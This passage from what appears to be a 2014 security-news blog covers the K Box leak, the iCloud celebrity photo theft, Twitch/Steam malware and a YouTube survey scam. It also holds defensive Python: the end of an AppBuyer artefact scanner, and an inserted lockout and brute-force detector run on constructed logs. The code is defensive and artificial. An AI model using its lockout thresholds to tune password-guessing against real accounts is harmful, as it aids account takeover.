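    """Scan a constructed infected tree and an empty one; return both results."""
    with tempfile.TemporaryDirectory() as bad, tempfile.TemporaryDirectory() as clean:
        build_sample_tree(bad)
        return scan(bad), launchd_program(bad), scan(clean)


if __name__ == "__main__":
    print(demo())
```

Use it on a device by running scan("/") from a shell on the jailbroken phone, or on a mounted image with its mount point as root. A clean scan only says the known artefacts are absent; because the installation route is unknown, a device that has had the files removed should still be treated as untrusted until it is restored.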

It has already released URL signatures to block the download of the malicious files listed above, and IPS and DNS signatures will follow. Blocking AppBuyer's executables from downloading effectively neutralises the malware.

16 September 2014

Leaked: K Box Singapore database with more than 317,000 names

Police report filed after database including personal details, such as contact numbers and date of birth, was made available for public download.


Personal details of more than 317,000 members of Karaoke entertainment operator K Box Singapore appear to have been leaked publicly.

At 4.17am on Tuesday morning (Sep 16), a group calling themselves The Knowns emailed links to the list of members' details to several media outlets, including MediaCorp.

The list includes names of K Box members as well as their contact numbers, email addresses, NRIC numbers, dates of birth and marital status. It also includes K Box-specific data, such as membership numbers and "K Points" earned.

Channel NewsAsia has been able to verify the details of several of the individuals on the list. One member, who confirmed her details in the list were accurate, said that K Box has not yet contacted her about any leak.

"I'm a bit freaked out," said the member, who asked to remain anonymous. "My main concern is that with those details, someone could sign me up for random stuff."

Another member whose name was found on the list said he was "extremely concerned what other personal information got leaked" and that he was also worried if other companies' databases had been hacked. He filed a police report reporting the leak on Tuesday afternoon.

The Police confirmed that the report has been lodged, and that they are looking into the matter.

K Box did not respond to phone or email queries from the media. A senior management staff at the company headquarters said the company had "no comment" on the issue.

Channel NewsAsia understands that the relevant government agencies are aware of the incident and are looking into it.

The group claiming responsibility for the leak said that it was in response to "the recent increase in toll at Woodlands", saying that it was "an unnecessary financial burden on working Malaysians".

"To show our displeasure, we are releasing the database of Kbox containing more than 300k personal details of its membership. We had done it before and will do it again."

15 September 2014

Apple relents, lets you "depurchase" that U2 album you never bought in the first place

Someone at Apple must be listening!

The company offered every iTunes user (let's call that half a billion people) a free copy of U2's latest album.

Largesse, swag, booty, a tchotchke, call it what you will.

U2's Songs of Innocence was a global freebie announced at Apple Live 2014, Apple's annual product launch extravaganza.

In fact, getting the free album turned out to be an offer so good that you simply couldn't refuse.


And when I say that, I'm not being metaphorical.

You literally couldn't refuse, because the product was automatically clocked up as one of your iTunes purchases and downloaded to your device.

By default (unless you had turned on an iTunes feature called Automatic Downloads), the actual music data itself wasn't pushed to your iPhone.

But the album and its track list arrived automatically:


Strictly speaking, clicking to listen to a song for the first time meant clicking to download-and-listen, but that's a somewhat pedantic distinction, almost like the difference between double-clicking and single-clicking to open an email attachment.

Opinions were strongly divided.

One Naked Security reader told us:

"Hey, it's a gift so stop the ridiculous fussing. If you don't want it just don't download it. OK? My goodness all these desperate, angst-inspiring First World problems."

Another took the middle ground:

"The problem is Apple seem to have such brand power over their customers that arrogance is creeping into their marketing.

Still, as others have pointed out, at least it wasn't Justin Bieber."

But one commenter wondered aloud, "Where does this sort of stunt end?"

"Today it's the next U2 album. Tomorrow it's a piece of propaganda on your Kindle. The next day it's an app so Big Brother can watch you."

The album certainly wasn't opt-in, because it turned up without even asking you.

But there were all sorts of problems that meant it wasn't even really opt-out, either.

For example, you could left-swipe on each song to reveal a button labelled Delete.

Except that you had to listen to the song first.

You could hide the album in iTunes, so you'd still own it, and still be a statistic in the biggest album release ever; you just wouldn't see the album (or end up with it in some randomly chosen playlist).

You couldn't, it seems, disown, unbuy or depurchase it.

Until now.


Apple has listened, and come up with a free Album Removal Tool, though this part isn't automatic: you have to opt in to opting out:

In fact, if you remove the album now, then from 13 October 2014 onwards, you really will be able to purchase it.

Bono would approve; after all, he told TIME Magazine that he "[doesn't] believe in free music."

13 September 2014

New malware spreads over Twitch chat, targets Steam accounts

If you use gaming video streaming site Twitch, you’ll want to be careful what you click on. A new piece of malware spread through Twitch’s chat feature will attempt to bleed your Steam account dry, according to security software maker F-Secure.
The malware spreads through messages posted to Twitch chat that try to entice users into entering a weekly raffle. Click on the link, and a Java program will open up a phony raffle entry form.

Once you fill out and submit the form (which, according to F-Secure, doesn’t actually get sent anywhere), the malware goes to work. It installs and runs a Windows binary that can gain access to your Steam account and add friends, accept friend requests, trade items, and sell items in the market at a discount.
As a result, the malware can “wipe your Steam wallet, armory, and inventory dry,” according to F-Secure, and sell your items at a discount on the Steam Community Market. The idea here is that the attacker can sell uninteresting items from your account, then buy themselves more interesting items. Shady.

Since this all happens on your system, it bypasses Steam’s security measures to prevent others from logging into your account on another PC. F-Secure recommends that Steam add new security measures “for those trading several items to a newly added friend and for selling items in the market with a low price based on a certain threshold.” 

12 September 2014

Massive “Gmail Credentials” Dump Posted Online

While the linked article sounds a bit scary with mentions of a “big security breach” for Gmail, that isn’t the case here and there’s no need to run screaming for the hills just yet. 

What actually appears to have happened is that somebody rolled up lots of older data dumps originating from various causes (such as phishing and / or password reuse) and released it all in one go, posting it to a Bitcoin forum. 

As these logins could give scammers access to Gmail should the email and passwords match up, Google took a look at the data and the results are as follows:
  • Less than 2% of what is claimed to be close to 5 million account credentials “might” have worked, and their automated detection systems would have “blocked many of those login attempts.”
  • Enabling the various security tools on offer from Google will help to bump up the security level on your accounts and services. Passwords, recovery options, 2-step verification – all of these are available to you.
  • These leaked accounts were not the result of a breach of Google systems.
The popular Haveibeenpwned site, run by well-known software architect and Microsoft MVP Troy Hunt – which lets visitors check if their username or email address (NOT password) has appeared in any data breaches – has been updated to reflect this latest data dump.

It seems 17% of the accounts were already in there to begin with. If you’re wanting to keep up with the latest stats, figures and “Where has this data been seen before” you should keep an eye on that particular Twitter account as it promises to be a busy few days.

Otherwise, don’t panic and have a look at your security settings sooner rather than later. You’ll likely be glad you did.

10 September 2014

'Apple Pay' is a Touch ID-based mobile wallet included with iPhone 6, rolls out in October

Apple will enter the mobile payment space in a big way with this month's launch of the iPhone 6 and iPhone 6 Plus, both of which will ship with integrated near-field communications technology to allow secure wireless payments through a service called Apple Pay.


In unveiling Apple Pay, Apple Chief Executive Tim Cook noted that current credit cards are not secure, featuring exposed numbers and "outdated and vulnerable" magnetic stripes. Apple Pay aims to solve this by securely holding banking and card information on a user's iPhone 6 or iPhone 6 Plus.

In showcasing Apple Pay, Apple executive Eddy Cue noted that the company won't know what the user bought, how they bought it, or how much they paid for it. The details of the transaction are entirely between a user and their bank.


Apple has partnered with American Express, MasterCard and Visa for digital debit cards and credit cards. In addition, the six biggest issuing banks in the U.S. are on board, representing 83 percent of credit card volume in the U.S.

The new system will work with 220,000 locations that allow contactless payments. And Apple says its method is more secure because cashiers don't get to see a customer's name, credit card number or security code.


Apple Pay will launch in the U.S. next month, though Apple is planning to roll out in more countries soon.

09 September 2014

Apple just added another layer of iCloud security, a day before iPhone 6 event

Apple said it was beefing up security after last week's nude celebrity hack, and now it looks like the company is following through on its promise. MacRumors is reporting that the company has begun sending out alert emails whenever iCloud accounts are accessed through a web browser. Notably, the alerts aren't triggered when the service detects a new browser; they are sent even when the specific browser has already been used to access the account.

Because iCloud is typically used to link apps, browser logins are now being treated as unusual enough to warrant an alert by themselves.

These alerts wouldn't prevent hacks, but they would provide an earlier indication that an account had been compromised, making it easier to stop hacks in progress and potentially trace back whoever is trying to break into the account. It's also an important sign that Apple is turning new attention to iCloud, which many in the industry have seen as a neglected part of Apple's otherwise seamless infrastructure.

It's also an interesting move in the run up to Apple's event tomorrow, which many expect will bring new features to iCloud.

08 September 2014

Review your Facebook privacy settings with Privacy Checkup

Facebook's Privacy Checkup tool - informally dubbed "Privacy Dinosaur" - has been made available for use to all users of the popular social network.

Initially introduced and tested in April by a small number of users, the tool has obviously passed muster, and the rest of the users will soon be prompted to try it out via a pop-up.

Or, they could test it right away, by clicking on the padlock icon in the top right corner of their Facebook page and choosing the (unmissable) option.

In three steps, the tool will invite you to review and change the default setting determining who will see your posts, the settings for the apps you've logged into with Facebook, and personal information you have included in your profile.

The tool is extremely easy to use and doesn't overwhelm users with information, and will hopefully give them a push towards reviewing all their privacy settings and learning more about them.


One might wonder why, after years of pushing users to share more info publicly, Facebook has now started worrying about user privacy.

It's likely that Facebook is trying to rehabilitate its image with the greater public, and make users who worry about privacy continue to share useful data.

Earlier this year, at the F8 developers conference, the company announced that users who are worried about data collected via apps will soon be offered the choice to log in to third-party apps anonymously.

Facebook is apparently after user numbers and data, but for themselves. The company is reportedly working on a mobile ad network similar to Google's, as it's looking to get a bigger cut of the ad revenue.

06 September 2014

Nude Celebrity Photo Dump Has Many Asking What Happened


Hundreds of private photos belonging to several high-profile Hollywood actresses were posted online this past weekend. They are explicit in nature, and were not intended to be seen by the public. But they have been.

The question, now, is how did this happen?

The details of the hackings haven’t been worked out quite yet, but there are two popular theories floating around: the first is that the hacker, or hackers, exploited a vulnerability allowing cybercriminals to make an unlimited number of password guesses on Apple’s cloud service offering, iCloud. This type of attack—repeatedly guessing passwords until the successful password is found—is called a brute force attack, and is typically done with an automated program. Once an iCloud account is breached, or any cloud service for that matter, the hackers can view and retrieve anything saved in that cloud such as contacts, photos, saved notes, and more.

The second theory, one suggested by Apple after it made an official statement on the situation, is that these celebrities may have fallen victim to a social engineering attack. Social engineering attacks are attacks that take advantage of social habits in order to compromise an account or gain access to sensitive information. For example, a “hacker” could pose as someone who works at your company, but in a different department, in order to trick you into giving up sensitive company information. This wouldn’t be the first time that a social engineering attack made headlines. In 2012, digital journalist Mat Honan had his life turned upside down when hackers gained access to nearly all of his online accounts through social engineering techniques.

Regardless of which theory is accurate, the result is fairly predictable: someone involved with the hacking ring, or the single person who accrued all of these photos, wanted to show off on an Internet imaging board and posted stolen photos. Those photos, of course, were shared throughout the Web, and the privacy of these well-known individuals was shattered.

We won’t know what hacking method was used for some time, possibly not until after an F.B.I. investigation. That investigation won’t restore anyone’s lost privacy, but it’ll hopefully result in some much-needed justice. In the meantime, what can people do in order to protect themselves from such attacks?


Of course, with celebrities being in the public eye, the demand for their personal photos is quite high. Still, while you may not be a celebrity, there are a few important steps that you can take to protect your online identity, and your private photos.
  • Be wary of uploading to the cloud. By default, iPhones upload photos to iCloud through a feature called “Photo Stream.” This is done to preserve your photos in the event of phone failure, and enable you to access photos from any of your devices. In this context, however, having personal photos in multiple places only increases the likelihood of those photos leaking. If you feel that you need to disable Photo Stream, follow Apple’s instructions here.
  • Be careful what photos you take with your mobile device. Even if you’re not sending them to anyone or uploading to the cloud, do remember that your phone or tablet can be lost or stolen. 
  • Use strong passwords. Every online service requires the use of a password. These passwords need to be complex in order to ensure your security. A complex password consists of at least eight characters in length and uses a combination of upper and lower case letters, numbers and symbols. These passwords should be unique to each site and should be changed every six months at a minimum.
  • Use a password manager. The reason why strong passwords aren’t used enough is largely attributed to the fact that they’re more difficult to remember. Complex passwords can also be a pain to use on mobile devices.
  • Enable two-factor authentication wherever possible. Two-factor authentication is a security standard that requires the account holder to possess two things: knowledge (like a password or answer to security questions) and something that only they would have (like a phone number). Two-factor authentication is a great way of preventing hackers from gaining access to sensitive accounts, and would’ve likely prevented this whole situation from taking place if enabled.

Be warned: there is no one silver bullet to digital security. Vulnerabilities exist because of how programs are built and how they interact with one another. The best way to stay secure online is to stay knowledgeable about security defenses and apply the techniques you need to surf safely.

05 September 2014

“YouTube Account Manager has sent you a Message…”


We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

YouTube account manager has sent you a message
We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
Please follow the following instructions to recover your account:
1. Please contact your account manager here: [url]
2. You have to complete a quick survey to make sure you are human.
3. Wait for our email explaining the next steps.

* If you decide to ignore this message and not follow the above steps your account will be suspended.
You can see examples of this on posts made by puzzled YouTubers over on Instagram [1], [2], Yahoo [1] and a few more people complaining about it in Google Groups.

This is what you would see after hitting the supplied link in the message:
Account Management.
“Complete a survey to verify your account”

This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now.
The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads.

If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download.

However, that doesn’t mean we should rush to jump through their survey sign-up hoops either.
Steer clear of this one, and keep on making those videos.

04 September 2014

Apple Not Hacked In Celebrity Nude Photo Breaches

"Very targeted attack" on celebrities' Apple usernames, passwords, security questions -- iCloud, Find My iPhone not breached, Apple says.


This afternoon, Apple confirmed that stolen and leaked private photos of several celebrities were not due to a breach in its iCloud or Find My iPhone services. Speculation swirled over just how the attackers accessed the accounts of Jennifer Lawrence, Jenny McCarthy, Rihanna, Kate Upton, Mary E Winstead, and others.

A trove of naked photos and video content stolen from the stars appeared on the 4Chan chatroom site over the weekend. Questions about how the hackers got hold of the celebs' accounts began to center around a possible flaw in Apple's iCloud and Find My iPhone after Apple reportedly issued an update that fixed a hole that would allow a brute-force password attack.

In a statement issued today, Apple said:

"When we learned of the theft, we were outraged and immediately mobilized Apple's engineers to discover the source. Our customers’ privacy and security are of utmost importance to us. After more than 40 hours of investigation, we have discovered that certain celebrity accounts were compromised by a very targeted attack on user names, passwords and security questions, a practice that has become all too common on the Internet. None of the cases we have investigated has resulted from any breach in any of Apple’s systems including iCloud or Find my iPhone. We are continuing to work with law enforcement to help identify the criminals involved."


Apple recommends users create strong passwords and use two-factor authentication, which is an option for Apple ID accounts. Apple did not comment on the reported flaw nor did it respond to questions about it via a media inquiry.

One security expert says he tested whether AppleID would lock him out after a certain number of attempts after hearing about the possible patch by Apple: It did. "After ten attempts, it locked me out," says Rik Ferguson, global vice president of security research at Trend Micro. He was unable to confirm whether Apple's authentication service had always done so, or whether this was due to a fix by Apple in the wake of the celeb hacks.

Either way, brute-forcing would require knowing the email address of the target, he says.
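The lockout Ferguson observed, and the guessing pattern it defends against, can be modelled in a few lines. The following is an added example (not Apple's code, nor from Trend Micro or the article): a per-account counter that locks after a threshold of consecutive failures, and the same counter replayed over authentication log lines to flag accounts under a guessing attempt. The log format, the addresses and the threshold of 10 are constructed assumptions.

```python
"""Lockout policy and brute-force detection, written as an added example
for this page; the log format, addresses and threshold are constructed."""
import hashlib
import hmac
import re
from collections import defaultdict
from dataclasses import dataclass

LOCKOUT_THRESHOLD = 10  # the "ten attempts" the article reports; assumed as the policy value


def _digest(password: str) -> str:
    # One-way digest so the demo never compares plaintext (a real service would use a slow KDF)
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


@dataclass
class _AccountState:
    failures: int = 0
    locked: bool = False


class LoginGuard:
    """Counts consecutive failures per account and refuses further attempts
    once the threshold is reached, until an out-of-band unlock."""

    def __init__(self, credentials: dict[str, str], threshold: int = LOCKOUT_THRESHOLD):
        self._digests = {user: _digest(pw) for user, pw in credentials.items()}
        self._threshold = threshold
        self._state: dict[str, _AccountState] = defaultdict(_AccountState)

    def attempt(self, user: str, password: str) -> str:
        """Returns 'ok', 'fail' or 'locked'. A locked account rejects even the right password."""
        state = self._state[user]
        if state.locked:
            return "locked"
        if hmac.compare_digest(self._digests.get(user, ""), _digest(password)):
            state.failures = 0
            return "ok"
        state.failures += 1
        if state.failures >= self._threshold:
            state.locked = True
            return "locked"
        return "fail"

    def unlock(self, user: str) -> None:
        # Models the out-of-band reset a lockout implies (support call, verified email link)
        self._state[user] = _AccountState()


# Constructed log format for the detector: "<timestamp> auth <ok|fail> user=<id> src=<ip>"
_LOG_LINE = re.compile(r"^(?P<ts>\S+) auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<src>\S+)$")


def detect_guessing(log_lines, threshold: int = LOCKOUT_THRESHOLD) -> dict[str, list[str]]:
    """Replays auth events and reports each account whose run of consecutive
    failures reaches the threshold before a success, with the source addresses seen."""
    failures: dict[str, int] = defaultdict(int)
    sources: dict[str, set[str]] = defaultdict(set)
    alerts: dict[str, list[str]] = {}
    for line in log_lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not auth events
        user, result, src = m["user"], m["result"], m["src"]
        if result == "ok":
            failures[user] = 0
            sources[user].clear()
            continue
        failures[user] += 1
        sources[user].add(src)
        if failures[user] >= threshold and user not in alerts:
            alerts[user] = sorted(sources[user])
    return alerts


# Constructed sample: 12 failures against one account from two addresses, and a user who mistypes once
SAMPLE_LOG = [
    f"2014-09-01T02:00:{i:02d}Z auth fail user=alice@example.com src=198.51.100.{7 + i % 2}"
    for i in range(12)
] + [
    "2014-09-01T02:00:13Z auth fail user=bob@example.com src=203.0.113.5",
    "2014-09-01T02:00:14Z auth ok user=bob@example.com src=203.0.113.5",
]

if __name__ == "__main__":
    guard = LoginGuard({"alice@example.com": "correct horse"})
    outcomes = [guard.attempt("alice@example.com", f"guess{i}") for i in range(10)]
    print(outcomes[-1], guard.attempt("alice@example.com", "correct horse"))  # locked locked
    print(detect_guessing(SAMPLE_LOG))
```

Note that the detector keys on the account rather than the source address, which is the point Ferguson makes: a guesser who knows the target email can spread attempts across addresses, so a per-address limit alone would miss it.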

It's not surprising that most consumers and celebrities don't opt for the second factor of authentication since it's not required, experts say. And weak passwords most likely played a major role in the attack, they say.

"This breach could have been prevented if iCloud required users to use a two-factor authentication to access their accounts. This will require users to enter a numerical code that is sent to their phone or another device, in addition to using their regular password," says Vijay Basani, CEO of EiQ Networks. "Since numerical code always changes, it makes it difficult for the hackers to gain access [and breach the account], even if they can guess the password."

03 September 2014

Apple denies its services were hacked


“Celebgate” – as the theft and publication of private photos of more than 100 actresses and models has come to be known – is not only affecting the direct victims of the theft but also the companies that have been implicated in the affair.

Initially, it was thought that the leaks could be due to a potential security hole in iCloud, Apple’s virtual storage platform, but the company has announced that, after a 40-hour investigation, they have discovered that the accounts of these celebrities “were compromised by a very targeted attack on user names, passwords and security questions,” adding that these attacks have “become all too common on the Internet.”

Apple denies that the hacking of the accounts of actresses such as Jennifer Lawrence, Kirsten Dunst and Kate Upton was the consequence of a vulnerability in its iCloud or ‘Find my iPhone’ services, although some of the victims have already had their say on the issue.

The company has also announced that it continues to work with the police to help identify the criminals involved and encourages all users to choose a strong password and double check their security systems.

02 September 2014

Reported Apple iCloud Hack Leaked Hundreds of Nude Celebrity Photos

This is going to be the height of privacy breaches! Nude images of several high-profile personalities including actors, models, singers and presenters have been made available online in a blatant hacking leak linked to the Apple iCloud service.


The recent privacy breach appears to be one of the biggest celebrity privacy breaches in history and represents a serious offense and violation of privacy. A hacker allegedly breached Apple’s iCloud service and copied the personal photos of at least 100 high-profile stars.

WHO IS BEHIND IT
The anonymous hacker, using the name Tristan, sparked the scandal on Sunday after dumping a large cache of female celebrities' alleged naked photographs onto the 4chan online forum, an online message board used for sharing pictures.

The list of those celebrities allegedly affected, whose nude photographs are supposedly in this cache, is very long and includes Jenny McCarthy, Rihanna, Kirsten Dunst, Kate Upton, the American actress Mary E Winstead, and the Oscar-winning actress Jennifer Lawrence.


HOW ALL THIS BEGAN
The anonymous hacker behind the leaked images scandal posted a brief statement saying that they were going to bed because "s*** was getting real."

On Sunday evening, the anonymous user began posting the nude images of dozens of celebrities on the 4chan website. It is still unclear how the photographs ended up online, but the anonymous hacker may have obtained more than 423 nude images of over 100 celebrities without their permission.

Within hours Twitter was awash with hundreds of thousands of tweets about the photographs, which are also alleged to include Brits Michelle Keegan, Cara Delevingne, Cat Deeley and Kelly Brook.

CELEBS ADMITTED - SNAPS ARE REAL
The 24-year-old Hunger Games and X-Men actress Jennifer Lawrence and several others have confirmed that the leaked photographs are genuine, while some celebrities have disputed the authenticity of the images.

The superstar Jennifer Lawrence's representative previously reported that Lawrence’s photographs were stolen, calling the hack “a flagrant violation of privacy.” The spokesperson also added, “The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence.”

Mary Elizabeth Winstead from Final Destination 3 was also a victim of the hack. The actress took to Twitter to react to having her images exposed.


HOW PHOTOGRAPHS WERE OBTAINED
It is believed that the leaked photographs of high-profile celebs were obtained by the hackers via a massive hack of Apple's iCloud. The nude images were then posted on the 4chan website by users offering more explicit material in exchange for bitcoin payments.

The hacker on 4chan is also claiming to have over 60 nude selfies and an explicit sex film of the Oscar-winning actress, Jennifer Lawrence, which is available for a fee in Bitcoins.

NO RESPONSE FROM APPLE
Apple has declined to comment. It has not yet confirmed that its iCloud service was involved in the alleged leak.

Apple's encryption of data in general is considered to be robust, but access to it could be gained if an attacker is able to guess a user's password, which could be obtained through a ‘brute force’ attack or a ‘social engineering’ trick.

Alternatively, an account can be accessed by resetting it: finding the user's email address and then answering the traditional ‘security questions.’

01 September 2014

Jennifer Lawrence: Victim of a security hole in iCloud?

If you are on Twitter you may have noticed the actress Jennifer Lawrence has been ‘Trending Topic’ since yesterday afternoon.


The reason? The leak of nude photos of the 2013 Academy Award winner on the /b/ forum of 4Chan.

She has confirmed the story, although she is apparently not the only victim.


Other models and actresses such as Kirsten Dunst, Kate Upton or Ariana Grande have also allegedly had pictures leaked, although not all these cases have been confirmed. Meanwhile, Mary E. Winstead has acknowledged the authenticity of the pictures that have been circulated, while Victoria Justice has denied that some photos allegedly of her are authentic.

It is still not clear how ‘Celebgate’ (as some are referring to this massive hacking) was carried out. Some sources have suggested a possible security breach in iCloud, Apple’s virtual data storage platform, though the company has yet to confirm this.

Until it is known how these images were stolen, the best anyone can do is apply common sense and ensure they use strong passwords to access their services. We also recommend that users check their Apple ID account.